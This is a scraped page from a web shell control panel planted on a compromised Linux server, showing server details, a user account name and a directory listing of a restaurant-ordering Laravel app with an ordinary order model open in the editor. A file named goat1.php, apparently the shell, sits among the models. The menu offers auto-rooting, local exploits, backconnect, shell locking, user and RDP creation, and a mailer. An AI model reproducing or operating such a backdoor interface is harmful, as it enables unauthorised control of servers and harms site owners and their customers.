Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo9.com /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
Scopes
[ DIR ]
drwxrwxr-x
Addon.php
176
B
-rwxrwxr-x
Address.php
681
B
-rwxrwxr-x
AiAgent.php
549
B
-rwxrwxr-x
AiChatHistory.php
798
B
-rwxrwxr-x
Analytic.php
564
B
-rwxrwxr-x
AnalyticSection.php
656
B
-rwxrwxr-x
Branch.php
738
B
-rwxrwxr-x
CapturePaymentNotification.php
411
B
-rwxrwxr-x
Currency.php
517
B
-rwxrwxr-x
DefaultAccess.php
459
B
-rwxrwxr-x
DiningTable.php
1.03
KB
-rwxrwxr-x
FrontendDiningTable.php
894
B
-rwxrwxr-x
FrontendOrder.php
3.53
KB
-rwxrwxr-x
GatewayOption.php
594
B
-rwxrwxr-x
Item.php
3.61
KB
-rwxrwxr-x
ItemAddon.php
785
B
-rwxrwxr-x
ItemAttribute.php
397
B
-rwxrwxr-x
ItemCategory.php
1.7
KB
-rwxrwxr-x
ItemExtra.php
640
B
-rwxrwxr-x
ItemVariation.php
1.42
KB
-rwxrwxr-x
Language.php
768
B
-rwxrwxr-x
Menu.php
101
B
-rwxrwxr-x
MenuSection.php
348
B
-rwxrwxr-x
MenuTemplate.php
350
B
-rwxrwxr-x
MessageHistory.php
900
B
-rwxrwxr-x
NotificationAlert.php
855
B
-rwxrwxr-x
NotificationSetting.php
506
B
-rwxrwxr-x
Offer.php
1.56
KB
-rwxrwxr-x
OfferItem.php
724
B
-rwxrwxr-x
Order.php
3.95
KB
-rwxrwxr-x
OrderAddress.php
921
B
-rwxrwxr-x
OrderItem.php
2
KB
-rwxrwxr-x
Otp.php
455
B
-rwxrwxr-x
Page.php
1012
B
-rwxrwxr-x
PaymentGateway.php
962
B
-rwxrwxr-x
SmsGateway.php
613
B
-rwxrwxr-x
Subscriber.php
348
B
-rwxrwxr-x
Tax.php
624
B
-rwxrwxr-x
ThemeSetting.php
1.05
KB
-rwxrwxr-x
Transaction.php
709
B
-rwxrwxr-x
User.php
3.51
KB
-rwxrwxr-x
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FrontendOrder.php
<?php namespace App\Models; use App\Enums\OrderStatus; use App\Models\Scopes\BranchScope; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class FrontendOrder extends Model { use HasFactory; protected $table = "orders"; protected $fillable = [ 'order_serial_no', 'token', 'user_id', 'branch_id', 'subtotal', 'discount', 'delivery_charge', 'total', 'order_type', 'order_datetime', 'delivery_time', 'preparation_time', 'is_advance_order', 'address', 'payment_method', 'payment_status', 'status', 'dining_table_id', 'source' ]; protected $casts = [ 'id' => 'integer', 'order_serial_no' => 'string', 'token' => 'string', 'user_id' => 'integer', 'branch_id' => 'integer', 'subtotal' => 'decimal:6', 'discount' => 'decimal:6', 'delivery_charge' => 'decimal:6', 'total' => 'decimal:6', 'order_type' => 'integer', 'order_datetime' => 'datetime', 'delivery_time' => 'string', 'preparation_time' => 'integer', 'is_advance_order' => 'integer', 'payment_method' => 'integer', 'payment_status' => 'integer', 'status' => 'integer', 'dining_table_id' => 'integer', 'source' => 'string' ]; public function orderItems(): \Illuminate\Database\Eloquent\Relations\HasMany { return $this->hasMany(OrderItem::class, 'order_id', 'id'); } public function items(): \Illuminate\Database\Eloquent\Relations\BelongsToMany { return $this->belongsToMany(Item::class, 'order_items'); } public function user(): \Illuminate\Database\Eloquent\Relations\BelongsTo { return $this->belongsTo(User::class)->withTrashed(); } public function address(): \Illuminate\Database\Eloquent\Relations\HasOne { return $this->hasOne(OrderAddress::class, 'order_id', 'id'); } public function branch(): \Illuminate\Database\Eloquent\Relations\BelongsTo { return $this->belongsTo(Branch::class); } public function scopePending($query) { return $query->where('status', OrderStatus::PENDING); } public function scopePreparing($query) { return $query->where('status', OrderStatus::PREPARING); } public function scopePrepared($query) { return $query->where('status', OrderStatus::PREPARED); } public function scopeOutForDelivery($query) { return $query->where('status', OrderStatus::OUT_FOR_DELIVERY); } public function scopeDelivered($query) { return $query->where('status', OrderStatus::DELIVERED); } public function scopeCanceled($query) { return $query->where('status', OrderStatus::CANCELED); } public function scopeReturned($query) { return $query->where('status', OrderStatus::RETURNED); } public function scopeRejected($query) { return $query->where('status', OrderStatus::REJECTED); } public function transaction(): \Illuminate\Database\Eloquent\Relations\HasOne { return $this->hasOne(Transaction::class, 'order_id', 'id'); } public function diningTable(): \Illuminate\Database\Eloquent\Relations\BelongsTo { return $this->belongsTo(FrontendDiningTable::class); } }
Close